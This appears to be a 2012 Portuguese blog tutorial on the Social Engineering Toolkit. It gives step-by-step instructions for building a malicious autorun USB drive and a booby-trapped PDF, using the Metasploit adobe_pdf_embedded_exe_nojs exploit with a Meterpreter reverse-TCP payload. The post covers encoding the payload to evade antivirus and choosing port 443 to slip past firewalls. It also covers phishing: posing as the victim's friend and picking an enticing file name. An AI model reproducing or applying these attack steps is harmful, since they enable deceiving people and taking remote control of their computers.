quarta-feira, 4 de abril de 2012

Engenharia Social utilizando o SET



Engenharia Social utilizando o SET





1- Introdução
Descrição do conceito de Engenharia Social

Em Segurança da informação, chamamos de  Engenharia Social as práticas utilizadas para obter acesso a informações importantes ou sigilosas em organizações ou sistemas por meio da enganação ou exploração da confiança das pessoas. Para isso, o engenheiro social pode se passar por outra pessoa, assumir outra personalidade, fingir que é um profissional de determinada área, etc. É uma forma de entrar em organizações sem utilizar a força bruta ou de erros em máquinas. Explorar as falhas de segurança das próprias pessoas que, quando não treinadas para esses ataques, podem ser facilmente manipuladas. 
O que é a FERRAMENTA SET(Social Engineering Toolkit)

O SET é um avançado conjunto de ferramentas desenvolvidas para usar em rede sociais assistida por computador. Esta ferramenta ajuda a preparar o caminho mais eficaz para explorar o lado do cliente através de vulnerabilidades de aplicativos e fazer capturas de informações confidenciais do alvo (por exemplo, senhas de e-mail). Alguns dos os métodos de ataque mais eficiente e útil empregado pela SET incluem, alvo phishing e-mails com um arquivo anexo malicioso, ataques applet Java, baseados em navegador, exploração reunindo credenciais de website, criação de mídia infecciosas e portátil (USB /DVD / CD), ataques de e-mail em massa e outros semelhantes vetores múltiplos de ataque web. Esta combinação de métodos de ataque fornece uma plataforma poderosa para utilizar e selecionar a técnica mais persuasiva que poderia realizar um ataque contra os humanos.
A seguir faremos um passo-a-passo da ferramenta SET, mostrando como criar um arquivo PDF malicioso e um executável dentro de um pendrive visando obter informações de uma maquina.
Para iniciar SET pela parte gráfica ir para Backtrack | Penetração | Toolkit Engenharia Social ou use o console para executar os seguintes comandos como usuário root:
Isto irá executar SET e exibir as opções disponíveis para começar. É recomendável que atualizemos o SET para a última versão disponível, a fim de aproveitar ao máximo todos os recursos. Existem duas maneiras de atualizar o SET. Ao executar o programa, você será apresentado com um menu de seleção .
Selecionar no menu a opção 4 para realizar a atualização do SET:


Select from the menu on what you would like to do:
1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit
Enter your choice: 4

Você recebera as mensagens abaixo:

Updating the Social-Engineer Toolkit, be patient...
Restored 'src/html/index.html'
D update_set
U config/set_config
A src/exe
A src/exe/legit.binary
A src/multi_attack
A src/multi_attack/multiattack.py....
A templates/ebook.template
U templates/README
Updated to revision 344.
The updating has finished, returning to main menu..

Você também pode atualizar o programa executando o seguinte comando

# ./set-update
[*] Updating the Social-Engineer Toolkit please wait...
At revision 344.

Após a atualização, é preciso sair do programa e reiniciá-lo conforme a figura abaixo. Isso irá garantir que todas as alterações da atualização tenham efeito imediato.

# cd /pentest/exploits
#. /set

2-Passo-a passo
Exemplos de ataques com a ferramenta SET.

O tutorial irá demonstrar dois exemplos diferentes, onde o elemento humano será explorado para obtermos as informações que necessitamos. O primeiro exemplo ilustra um ataque utilizando  um pendrive que contem um arquivo malicioso, onde o mesmo é executado no momento que o usuário utiliza o pendrive em sua máquina .
O segundo exemplo exibe um método de obter o controle de uma máquina utilizando um arquivo com extensão pdf enviado por e-mail, utilizando técnicas de engenharia social.

Ataque a uma vitima utilizando um pen drive USB

            Vamos partir do pressuposto que você já tenha instalado o BACKTRACK versão 4 ou superior (você pode baixá-lo do endereço http://www.backtrack-linux.org/downloads/)

1)Abra um terminal console e digite as linhas abaixo:

# cd/pentest/exploits/SET
#./set

Segue tela que surgirá:


2) Escolha a opção 3 - Infectious Media Generator

3) A seguir devemos escolher o vetor. Selecione a opção 2 = Standard Metasploit Executable




4) Neste momento faremos o payload (resultado) que será utilizado. O mais utilizado é o Meterpreter Reverse TCP. Aqui estamos configurando para que nosso arquivo malicioso inicie uma conexão da maquina alvo para a maquina do atacante.  Segue tela de escolha:


5) O próximo passo é codificar o payload para dificultar a detecção do mesmo na maquina do alvo pelo anti-virus.




6) A seguir devemos escolher a porta pela qual faremos a conexão reversa. Devemos escolher uma porta que acreditamos não esta bloqueada no firewall da maquina alvo.  Aqui escolhemos a 443.


7) Após a tela acima será perguntado se deseja deixar o listerner ativado. Responda “yes”. Isto é necessário pois quando alvo for atacado, sua maquina devera esta preparada (ouvindo) para receber as informações.

8) No passo 5 foram criados 2 arquivos para o ataque via pendrive. Os arquivos estão no diretorio abaixo:
/pentest/exploits/set/autorun
No interior do mesmo teremos 2 arquivos com os seguintes nomes:

autorun.inf e template.pdf

Estes 2 arquivos devem ser inseridos no interior do pen drive. Caso você deseje renomear o arquivo Template.pdf para um outro nome diferente, será necessário editar o arquivo autorun.inf conforme abaixo:

[autorun]
open=novo_nome.pdf
icon=autorun.ico
Abaixo segue tela que informa que os arquivos foram criados.
9)Quando o pendrive for inserido na maquina alvo e o listerner de sua maquina estiver ativado, você receberá o shell da maquina conforme a tela abaixo:



Ataque a uma vitima utilizando um arquivo com extensão PDF malicioso

1) Abra um terminal console e digite as linhas abaixo:

# cd/pentest/exploits/SET
#. /set

Segue tela que surgirá:



2) Escolha a opção 4 – create a payload and listener
3) No menu abaixo selecione a opção 1




4) Esta opção permitirá que exploremos selecionemos o nosso exploit: Adobe PDF Escape Exe Social Engineering No Javascript opção 15.







5) Neste passo devemos setar as configurações do nosso exploit. Lembre-se que o nome do arquivo deve ter um nome que desperte o interesse do nosso alvo.




Segue significado de cada configuração:

Use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Usar adobe pdf embutido em um exploit

set payload windows/meterpreter/reverse_tcp
Utilizar a conexão reversa quando o exploit for executado

set filename nome_arquivo.pdf
Configurar o nome do arquivo pdf. Use a imaginação e torne o nome do arquivo o mais atraente possível para o alvo.

set lhost 192.168.8.92
Configurar o ip da maquina que receberá a conexão reversa. Aqui deve ser o ip do atacante.

set lport 443
Configurar uma porta que você utilizará no listener.Sempre utilize uma porta que tenha chance de esta liberarada no firewal.

exploit
Gera o arquivo PDF malicioso
                      
Após feita as configurações seu expoit será gerado e armazenado no diretório abaixo:

/root/.msf4/data/exploits/nome_arquivo.pdf

6) O próximo passo é enviarmos este arquivo ao nosso alvo. No nosso exemplo utilizaremos o e-mail como o vetor para o ataque. É importante que tenhamos já feito uma pesquisa anterior, buscando levantar informações sobre o nosso alvo. Isto nos ajudará a aumentar as chances de nosso ataque ter sucesso. A ideia é enviar um e-mail que contenha um assunto que seja de interesse do nosso alvo(sexo,filmes,hobbys,esporte etc).No caso enviaremos um e-mail nos passando por uma amigo do nosso alvo. Veja como ficaria nosso e-mail.




7) Acreditando se tratar de uma mensagem de um amigo e desconsiderando as mensagens emitidas pelo o anti-virus de sua máquina, quando ele abrir o anexo em pdf do e-mail teremos do lado da maquina do atacante a seguinte tela.




3-Bibliografia:

http://vishnuvalentino.com/computer/hacking-windows-using-usb-stick-social-engineering-toolkit/

http://vishnuvalentino.com/computer/client-side-attack-using-adobe-pdf-escape-exe-social-engineering/

http://www.backtrack-linux.org

http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)

Nenhum comentário:

Postar um comentário